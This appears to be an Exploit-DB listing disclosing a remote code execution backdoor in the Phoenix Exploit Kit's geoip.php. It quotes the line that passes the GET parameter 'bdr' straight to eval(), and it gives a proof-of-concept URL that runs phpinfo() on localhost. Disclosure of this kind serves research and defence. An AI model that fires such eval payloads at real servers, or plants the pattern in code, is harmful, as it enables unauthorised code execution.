Phoenix Exploit Kit - Remote Code Execution

Author: CrashBandicot
type: webapps
platform: php
port: 80.0
date_added: 2016-07-01  
date_updated: 2017-11-16  
verified: 1  
codes:   
tags: Malware  
aliases:   
screenshot_url:   
application_url:   

raw file: 40047.txt  

# Exploit Title: Phoenix Exploit Kit - Remote Code Execution
# Exploit Author: CrashBandicot @DosPerl
# Date: 2016-06-30
# Tested on: MSWin32

# Vuln file : geoip.php

492.  isset($_GET['bdr']) ? eval($_GET['bdr']) : explode('nop','nop nop nop');

# PoC : http://localhost/Phoenix/includes/geoip.php?bdr=phpinfo();

# Screen : http://i.imgur.com/E7RBBRk.png

__END__